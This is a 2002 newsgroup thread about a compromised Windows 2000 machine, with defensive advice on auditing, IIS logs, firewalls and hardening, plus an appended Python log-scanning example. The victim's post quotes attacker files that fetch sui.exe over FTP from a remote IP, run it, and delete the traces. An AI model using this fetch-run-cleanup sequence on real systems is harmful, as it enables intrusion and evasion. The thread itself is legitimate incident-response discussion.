Re: Is it really true that NTFS is secure?
From: Karl Levinson [x y] mvp (levinson_k@excite.com)
Date: 12/13/02
- In reply to: George Hester: "Re: Is it really true that NTFS is secure?"
From: "Karl Levinson [x y] mvp" <levinson_k@excite.com> Date: Fri, 13 Dec 2002 12:35:41 -0500
You can enable auditing to watch for things like this:
http://securityadmin.info/faq.htm#auditing
Checking your IIS web logs is another common place to check. Look for
anything that mentions .EXE or % and that also has a code 200 or 502 in that
line. URLScan is a free IIS tool that comes with IISLockdown from
www.microsoft.com/technet/security that will block all this stuff, if that's
what this is. Most firewalls won't detect or block this stuff.
Be sure you have a firewall, as this will log all traffic to and from your
server. The firewall should also block NetBIOS traffic on TCP and UDP ports
135-139 and 445 from the internet, as this is another way people could be
accessing your guest account.
Intrusion detection such as Black Ice or Snort [free] might be worth a try,
though getting Snort to alert just on interesting events on a Windows server
takes some knowledge.
The free file change checker from www.gfi.com can also help you monitor your
system for intrusions not caught by antivirus, trojan scanners or firewalls.
Other things to do to look for the source of the hacking and secure your
servers and computers are listed at:
http://securityadmin.info/faq.htm#hacked [first]
http://securityadmin.info/faq.htm#harden [second]
"George Hester" <hesterloli@hotmail.com> wrote in message
news:ufXDRfmoCHA.2424@TK2MSFTNGP12...
Please understand that my machine comes up empty handed on all AV scans and
trojans. I need to find some way of watching when this Group Policy change
happens. Like a log. That tells me the time that it happened or the
responsible party. It doesn't show in Event Viewer.
You know I ran a server W2K prior to this and never had this issue. Started
on Prof full time now and I am battling security it seems every hour.
-- George Hester
__________________________________
"George Hester" <hesterloli@hotmail.com> wrote in message
news:OwrkSZmoCHA.2424@TK2MSFTNGP12...
Yes you may be able to help me with something. My Guest user keeps getting
enabled and put in the Administrator group. How?
-- George Hester
__________________________________
"Karl Levinson [x y] mvp" <levinson_k@excite.com> wrote in message
news:eleuHGkoCHA.1628@TK2MSFTNGP12...
> Do you have a problem we could help you with? Are there more details?
>
> What does this code have to do with NTFS? I'm sorry if your machine was
> exploited, though I'm not sure this has to do with NTFS.
>
> NTFS file permissions are plenty secure against remote exploits. If you
> have other security vulnerabilities that permit running commands as an
> account that has permissions in the NTFS ACLs, that's not exactly an NTFS
> failing.
>
> Windows 2000 configured correctly is as secure as most other operating
> systems configured correctly. Windows 2000 in the default install is about
> as un-secure as Linux in the default install, especially if you go back to
> Linux from the year 2000. Securing Windows 2000 is about as complex and
> time consuming as securing Linux, maybe even easier.
>
> More information on ways to determine how you were hacked and how to secure
> your computer:
>
> http://securityadmin.info/faq.htm#hacked
> http://securityadmin.info/faq.htm#re-secure
> http://securityadmin.info/faq.htm#harden
>
>
> "George Hester" <hesterloli@hotmail.com> wrote in message
> news:uB7a4afoCHA.2220@TK2MSFTNGP09...
> '--------- File: s.t sitting in %SystemRoot%\system32 ->
> open #my.ip.address# 'changed ip for privacy
> binary
> recv sui.exe .\sui.exe
> quit
> /-------- End of s.t
>
> REM File r.bat sitting in %SystemRoot%\system32 -->
> ftp -vnAs:s.t
> del s.t
> sui.exe -s678p345 -o
> call g.bat
> del r.bat
> REM End of r.bat --------
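The IIS log check suggested in the reply above (entries that mention .EXE or % and also carry status 200 or 502), written out as an added example that is not part of the original thread. It assumes the W3C extended log format with a `#Fields:` directive and matches only the URI stem and query fields; the function name and the sample log are constructed for illustration.

```python
"""Flag IIS W3C log entries whose URI mentions .exe or % and returned 200 or 502."""

SUSPECT_STATUSES = {"200", "502"}

# Constructed sample log (not from the thread); addresses are documentation ranges.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-12-13 04:10:01 192.0.2.10 GET /default.asp - 200
2002-12-13 04:10:07 192.0.2.44 GET /scripts/sample.exe arg=1 200
2002-12-13 04:10:09 192.0.2.44 GET /scripts/a%5cb/sample.EXE - 404
2002-12-13 04:10:12 192.0.2.44 GET /scripts/a%5cb/tool.bin - 502
2002-12-13 04:11:30 192.0.2.10 GET /images/logo.gif - 200
"""


def suspicious_entries(log_text):
    """Return one dict per flagged line, keyed by W3C field name."""
    fields, hits = [], []
    for raw in log_text.splitlines():
        line = raw.strip()
        if line.startswith("#Fields:"):
            # The directive can change mid-file; always use the latest one.
            fields = line[len("#Fields:"):].split()
            continue
        if not line or line.startswith("#") or not fields:
            continue  # blank line, other directive, or no column map yet
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated or malformed entry
        entry = dict(zip(fields, values))
        # Assumption: restrict the match to the requested URI, not the whole line.
        uri = (entry.get("cs-uri-stem", "") + " "
               + entry.get("cs-uri-query", "")).lower()
        mentions = ".exe" in uri or "%" in uri
        if mentions and entry.get("sc-status") in SUSPECT_STATUSES:
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for e in suspicious_entries(SAMPLE_LOG):
        print(e["date"], e["time"], e["c-ip"], e["cs-uri-stem"], e["sc-status"])
```

The 404 entry is skipped because the check only reports requests the server answered with 200 or 502; each flagged client address and timestamp can then be compared against the firewall log.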